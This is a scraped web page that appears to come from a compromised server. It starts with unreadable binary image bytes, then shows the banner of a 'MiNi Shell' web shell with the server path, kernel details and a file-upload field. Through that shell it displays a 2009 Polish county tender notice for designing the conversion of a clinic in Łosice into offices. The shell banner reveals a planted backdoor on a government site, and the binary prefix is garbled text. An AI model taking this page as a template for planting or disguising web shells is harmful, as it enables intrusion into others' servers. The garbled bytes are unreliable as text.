JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090115/17419-N-2009.html

<p class="kh_header"><b>Łosice: Przetarg nieograniczony na wykonanie projektu budowlanego rozbudowy i zmiany sposobu użytkowania budynku powiatowej przechodni lekarskiej na budynek biurowy dla Powiatowego Urzędu Pracy i Powiatowego Centrum Pomocy Rodzinie oraz Urzędu Starostwa Powiatowego w Łosicach, wraz z zagospodarowaniem terenu, przy ul. Narutowicza 6</b><br>
<b>Numer ogłoszenia: 17419 - 2009; data zamieszczenia: 15.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Łosicach , ul. Piłsudskiego 6, 08-200 Łosice, woj. mazowieckie, tel. 083 3590334, faks 083 3590334.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.losice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na wykonanie projektu budowlanego rozbudowy i zmiany sposobu użytkowania budynku powiatowej przechodni lekarskiej na budynek biurowy dla Powiatowego Urzędu Pracy i Powiatowego Centrum Pomocy Rodzinie oraz Urzędu Starostwa Powiatowego w Łosicach, wraz z zagospodarowaniem terenu, przy ul. Narutowicza 6.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu budowlanego rozbudowy i zmiany sposobu użytkowania  budynku powiatowej przychodni lekarskiej na budynek biurowy dla Powiatowego Urzędu Pracy i Powiatowego Centrum Pomocy Rodzinie oraz Urzędu Starostwa Powiatowego w Łosicach, wraz z zagospodarowaniem terenu, przy ul. Narutowicza 6 w zakresie:
- przebudowa dachu,
- ocieplenie ścian zewnętrznych
- ocieplenie stropu
- wymiana stolarki okiennej i drzwiowej,
- wymiana instalacji c.o., wod. - kan. , elektrycznej,
- modernizacja kotłowni węglowej na gazową,
- dostosowanie pomieszczeń wewnętrznych dla potrzeb administracyjno-biurowych,

Działka o numerze ewid.820 obręb Łosice stosownie do ustaleń miejscowego planu zagospodarowania przestrzennego miasta Łosice dopuszcza podstawowe przeznaczenie terenu na usługi opieki socjalnej.
1.Wykonawca zobowiązuje się wykonać i dostarczyć do siedziby zamawiającego koncepcję układu funkcjonalno-użytkowego z symulacją kosztów w terminie do 3 tygodni od daty podpisania umowy.

2.W terminie do  15.05.2009 wykonawca dostarczy:
a)Projekt zagospodarowania działki wraz z elementami małej architektury i ciągami komunikacyjnymi pieszo-jezdnymi,
b)Projekt architektoniczno-budowlany obejmujący realizację obiektu na podstawie opracowanej koncepcji z uwzględnieniem uwag zamawiającego,
c)Projekt budowlano-konstrukcyjny,
d)Projekt instalacji sanitarnych:
- instalacji wewnętrznej wod.-kan.,
- instalacji wewnętrznej c.o. i gazowej,
- instalacji wewnętrznej elektrycznej,
- instalacja sieci komputerowej i alarmowej.
e) projekt przyłącza gazowego na potrzeby c.o. i c.w.u.
3.  zakres opracowania obejmuje wykonanie poniższych czynności oraz innych wszelkich niewymienionych i poniesienia z tego tytułu  niezbędnych kosztów związanych z kompleksową realizacją przedmiotowego zamówienia publicznego:
1)  pozyskanie wypisu i wyrysu z miejscowego planu zagospodarowania przestrzennego, uzyskanie aktualnych map do celów projektowych,
2) uzyskanie warunków przyłączenia obiektu do sieci gazowej,
3) uzyskanie wymaganych prawem wszystkich uzgodnień ( Bhp, p.poż, sanepid, ZUD itp.),
4)  opracowanie projektu budowlanego wraz z projektem wykonawczym dla całości zadania( wszystkie branże )- w 5 egzemplarzach na piśmie i 1 egz. w wersji elektronicznej,
5) opracowanie szczegółowego kosztorysu inwestorskiego dla całej inwestycji - 2 egz.
6) opracowanie przedmiaru robót w 1 egz. na piśmie i 1 egz. W wersji elektronicznej,
7) opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych po 1 egz. Na piśmie i po 1 egz. w wersji elektronicznej,
8) dokonanie wszelkich uzgodnień z instytucjami,
4.Pełnienie nadzoru autorskiego wynikającego z art. 20 ust.1 pkt4 ustawy Prawo budowlane ( zamawiający przewiduje średnio do 10 spotkań na każdy etap- rok inwestycji).
5.Dokumentacja powinna spełniać wszelkie warunki do uzyskania pozwolenia na budowę zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 03.07.2003 w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133 , ze zm.) oraz zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz.2072 ze zm.), oraz umożliwiać wykonanie inwestycji /projekt wykonawczy/
6.Kosztorys inwestorski powinien spełniać wszelkie warunki zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130, poz.1389)
7.Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody powstałe w związku z odmową udzielenia Zamawiającemu pozwolenia na budowę z powodu nieprawidłowości wykonanego projektu lub opóźnienia jego wydania z powodu nałożenia przez organ wydający pozwolenia na budowę, obowiązku usunięcia nieprawidłowości w projekcie, w tym również szkody polegające na opóźnieniu w realizacji inwestycji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 03.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium może być wniesione w jednej z następujących form:
1.Pieniądzu - przelewem na rachunek zamawiającego - oznacza to , że w terminie składania ofert wniesione wadium musi znaleźć się na rachunku zamawiającego.
2.Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
3.Gwarancjach bankowych
4.Gwarancjach ubezpieczeniowych

Wadium w formie pieniężnej należy wnieść na rachunek bankowy zamawiającego:    BS Łosice 90 8038 0007 0010 1101 2000 0120 w kwocie 10,000,00 PLN słownie: dziesięć tysięcy złotych.

Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy   nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
1.5. Wykaże się odpowiednim doświadczeniem tj. w ostatnich trzech lat a jeśli okres prowadzenia działalności jest krótszy- tym okresie, opracowali dokumentację odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. przynajmniej jeden wielobranżowy projekt budowlano-wykonawczy na budowę budynku użyteczności publicznej o kubaturze, co najmniej 10000m3.
1.6. Wykaże się dysponowaniem przynajmniej dwoma osobami zdolnymi do wykonania zamówienia t.j. w tym jeden projektant posiadający uprawnienia budowlane w spec. architektonicznej, którzy są członkami izby samorządu zawodowego.
2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1  nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa   zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2  podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3  wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4  złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5  nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z  zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
2.6  nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na  przedłużenie okresu związania ofertą. 
2.7  Inne podstawy wykluczenia wykonawców.
3. Zamawiający odrzuca ofertę jeżeli:
3.1  jest niezgodną z ustawą
3.2  jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem  art.  87 ust. 2 pkt. 3 Prawa zamówień publicznych.
3.3  jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu  nieuczciwej konkurencji 
3.4  zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
3.6  zawiera błędy w obliczeniu ceny 
3.7  wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie  omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
3.8  jest nieważna na podstawie odrębnych przepisów, 
4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą
5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na ofertę składają się następujące dokumenty i załączniki:
1.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę 
1.2) Formularz cenowy - wypełniony i podpisany przez wykonawcę 
1.3) Wzór umowy.   
2. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty: 
2.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
2.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
2.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
2.4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22Ustawy Prawa  zamówień publicznych oraz niepodleganiu wykluczeniu na podstawie art.24 ust.1 Prawa zamówień publicznych    
2.5)Wykaz wykonanych projektów z ostatnich trzech lat a jeśli okres prowadzenia działalności jest krótszy- tym okresie, opracowali dokumentację odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. przynajmniej jeden wielobranżowy projekt budowlano-wykonawczy na budowę budynku użyteczności publicznej o kubaturze, co najmniej 10000m3.
2.6)Kserokopie wymaganych uprawnień projektantów do wykonania niniejszego zamówienia wraz z kserokopiami dokumentów stwierdzających przynależność do izb samorządu zawodowego.
2.7) Kserokopia polecenia przelewu wadium lub informacja o wniesionej formie wadium
2.8)Parafowany wzór umowy przez wykonawcę .
2.9)W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 
   -   Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
  - Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  

3. Dokumenty , o których mowa w rozdziale  IX niniejszej specyfikacji , należy przedstawić w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osoby uprawnione do reprezentacji Wykonawcy ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.losice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Łosicach ul. Piłsudskiego 6, 08-200 Łosice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Łosicach ul. Piłsudskiego 6, 08-200 Łosice, pokój nr 61.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com